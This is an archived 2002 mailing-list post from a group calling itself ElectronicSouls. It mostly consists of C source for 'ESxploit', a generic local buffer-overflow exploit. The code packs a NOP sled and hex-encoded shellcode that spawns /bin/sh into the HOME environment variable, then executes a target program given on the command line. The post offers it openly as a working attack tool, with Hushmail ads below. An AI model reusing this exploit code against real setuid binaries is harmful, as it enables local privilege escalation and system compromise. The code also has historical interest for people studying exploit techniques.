lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Advances in Binary Auditing (PART TWO)

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We apologize for our oversight; in the first message sent titled 'Advances in Binary Auditing', we neglected to include the exploit portion of the auditing tool.

Here it is, enjoy, and do not abuse the knowledge!

# cat ESxploit.c
/* Exploit part of ESxploit,
 * local bof testing application
 * (C) BrainStorm - ElectronicSouls
 */

#define DEF_OFFSET 10

static char exec[]=
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65"
"\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73"
"\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b"
"\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01";


long esp(void){__asm__("movl %esp,%eax");}

   int main(int argc,char **argv){
        char bof[3000];
        int i,offset;
   long ret;

 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEF_OFFSET;}

 ret=(esp()-offset);
    printf(" *** ESxploit - BOF testing application \n");
    printf(" *** Return Address: 0x%lx, Offset: %d. ",ret,offset);
    printf("\n\n");


 for(i=1;i<241;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(237-strlen(exec));i++){*(bof+i)=0x90;}

     memcpy(bof+i,exec,strlen(exec));
     setenv("HOME", bof, 1);
     execlp(argv[2], argv[3], bof, 0);

}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"The winner won the race."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nCnIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltz/kAoJkSeE6eMaIk
wS7lssZ1RkKSsTr/AKC+SiYXzT8OO8/2k/TirxHfVYyeaw==
=lfo+
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ